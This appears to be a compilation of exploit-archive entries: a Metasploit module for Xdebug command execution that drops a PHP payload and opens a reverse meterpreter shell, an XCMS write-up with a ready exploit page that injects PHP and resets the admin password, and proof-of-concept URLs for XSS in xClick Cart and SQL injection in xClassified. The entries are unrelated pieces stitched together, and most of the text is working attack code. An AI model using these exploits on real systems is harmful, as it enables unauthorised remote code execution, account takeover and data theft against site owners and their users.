class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
include Rex::Proto::Http
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'xdebug Unauthenticated OS Command Execution',
'Description' => %q{
Module exploits a vulnerability in the eval command present in Xdebug versions 2.5.5 and below.
This allows the attacker to execute arbitrary php code as the context of the web user.
},
'DisclosureDate' => 'Sep 17 2017',
'Author' => [
'Ricter Zheng', #Discovery https://twitter.com/RicterZ
'Shaksham Jaiswal', # MinatoTW
'Mumbai' # Austin Hudson
],
'References' => [
['URL', 'https://redshark1802.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers/'],
['URL', 'https://paper.seebug.org/397/']
],
'License' => MSF_LICENSE,
'Platform' => 'php',
'Arch' => [ARCH_PHP],
'DefaultTarget' => 0,
'Stance' => Msf::Exploit::Stance::Aggressive,
'DefaultOptions' => {
'PAYLOAD' => 'php/meterpreter/reverse_tcp'
},
'Payload' => {
'DisableNops' => true,
},
'Targets' => [[ 'Automatic', {} ]],
))
register_options([
OptString.new('PATH', [ true, "Path to target webapp", "/index.php"]),
OptAddress.new('SRVHOST', [ true, "Callback host for accepting connections", "0.0.0.0"]),
OptInt.new('SRVPORT', [true, "Port to listen for the debugger", 9000]),
Opt::RPORT(80),
OptString.new('WriteableDir', [ true, "A writeable directory on the target", "/tmp"])
])
end
def check
begin
res = send_request_cgi({
'uri' => datastore["PATH"],
'method' => 'GET',
'vars_get' => {
'XDEBUG_SESSION_START' => rand_text_alphanumeric(10)
}
})
vprint_status "Request sent\n#{res.headers}"
if res && res.headers.to_s =~ /XDEBUG/i
vprint_good("Looks like remote server has xdebug enabled\n")
return CheckCode::Detected
else
return CheckCode::Safe
end
rescue Rex::ConnectionError
return CheckCode::Unknown
end
end
def exploit
payl = Rex::Text.encode_base64("#{payload.encoded}")
file = "#{datastore['WriteableDir']}"+"/"+rand_text_alphanumeric(5)
cmd1 = "eval -i 1 -- " + Rex::Text.encode_base64("file_put_contents(\"#{file}\",base64_decode(\"#{payl}\")) && system(\" php #{file} \")") + "\x00"
webserver = Thread.new do
begin
server = Rex::Socket::TcpServer.create(
'LocalPort' => datastore['SRVPORT'],
'LocalHost' => datastore['SRVHOST'],
'Context' => {
'Msf' => framework,
'MsfExploit' => self
})
client = server.accept
print_status("Waiting for client response.")
data = client.recv(1024)
print_status("Receiving response")
vprint_line(data)
print_status("Shell might take upto a minute to respond.Please be patient.")
print_status("Sending payload of size #{cmd1.length} bytes")
register_file_for_cleanup(file)
client.write(cmd1)
client.close
server.close
webserver.exit
ensure
webserver.exit
end
end
send_request_cgi({
'uri' => datastore['PATH'],
'method' => 'GET',
'headers' => {
'X-Forwarded-For' => "#{lhost}",
'Cookie' => 'XDEBUG_SESSION='+rand_text_alphanumeric(10)
}
})
end
end
Exploit Title: XCMS v1.83 - Remote Command Execution (RCE)
Author: Onurcan
Email: onurcanalcan@gmail.com
Site: ihteam.net
Script Download : http://www.xcms.it
Date: 26/12/2022
The xcms's footer(that is in "/dati/generali/footer.dtb") is included in each page of the xcms.
Taking "home.php" for example:
<?php
//home.php
[...]
include(CSTR."footer".STR); // <- "CSTR" and "STR" are the constants previously declared. They refers to "/dati/generali" and "dtb"
?>
So the xcms allow you to modify the footer throught a bugged page called cpie.php included in the admin panel.
So let's take a look to the bugged code.
<?php
//cpie.php
[...]
if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); } // <- so miss an exit() :-D
[...]
if(isset($_POST['salva'])){
Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- save the changements without any kind of control
}
[...]
?>
So with a simple html form we can change the footer.
Ex:
<form name="editor" action="http://[SITE_WITH_XCMS]/index.php?lng=it&pg=admin&s=cpie" method="post">
<input type="hidden" name="salva" value="OK" />
<textarea name="testo_0"><?php YOUR PHP CODE ?></textarea>
<input type="submit" value="Modifica" />
</form>
<script>document.editor.submit()</script>
Note: This is NOT a CSRF, this is just an example to change the footer without the admin credentials.
Trick: We can change the admin panel password by inserting this code in the footer:
<?php
$pwd = "owned"; // <- Place here your new password.
$pwd2 = md5($pwd);
unlink("dati/generali/pass.php");
$f = fopen("dati/generali/pass.php",w);
fwrite($f,"<?php \$mdp = \"$pwd2\"; ?>");
fclose($f);
?>
This code delete the old password file and then create a new one with your new password.
Fix:
<?php
//cpie.php
[...]
if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); exit(); } // with an exit() we can fix the bug.
[...]
if(isset($_POST['salva'])){
Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- save the changements without any kind of control
}
[...]
?>
So this is a simple exploit:
<?php
if(isset($_POST['send']) and isset($_POST['code']) and isset($_POST['site'])){
echo "
<form name=\"editor\" action=\"http://".$_POST['site']."/index.php?lng=it&pg=admin&s=cpie\" method=\"post\">
<input type=\"hidden\" name=\"salva\" value=\"OK\" />
<textarea name=\"testo_0\">".$_POST['code']."</textarea>
<input type=\"submit\" value=\"Modifica\" />
</form>
<script>document.editor.submit()</script>";
}else{
echo"
<pre>
XCMS <= v1.82 Remote Command Execution Vulnerability
Dork : inurl:\"mod=notizie\"
by Onurcan
Visit ihteam.net
</pre>
<form method=POST action=".$_POST['PHP_SELF'].">
<pre>
Site :
<input type=text name=site />
Code :
<textarea name=code cols=49 rows=14>Your code here</textarea>
<input type=submit value=Exploit />
<input type=hidden name=\"send\" />
</pre>
</form>";
}
?>
source: https://www.securityfocus.com/bid/51699/info
xClick Cart is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
xClick Cart versions 1.0.1 and 1.0.2 are affected; other versions may also be vulnerable.
http://www.example.com/pages/cart/webscr.php?cmd=_cart&ew=1&item_name=Scrimshaw+Kit&item_number=SK1&amount=25.00&quantity=1&shipping=&tax=0&shopping_url=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
source: https://www.securityfocus.com/bid/68438/info
xClassified is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
xClassified 1.2 is vulnerable; other versions may also be affected.
http://www.example.com/ads.php?catid=4%27a[SQLi]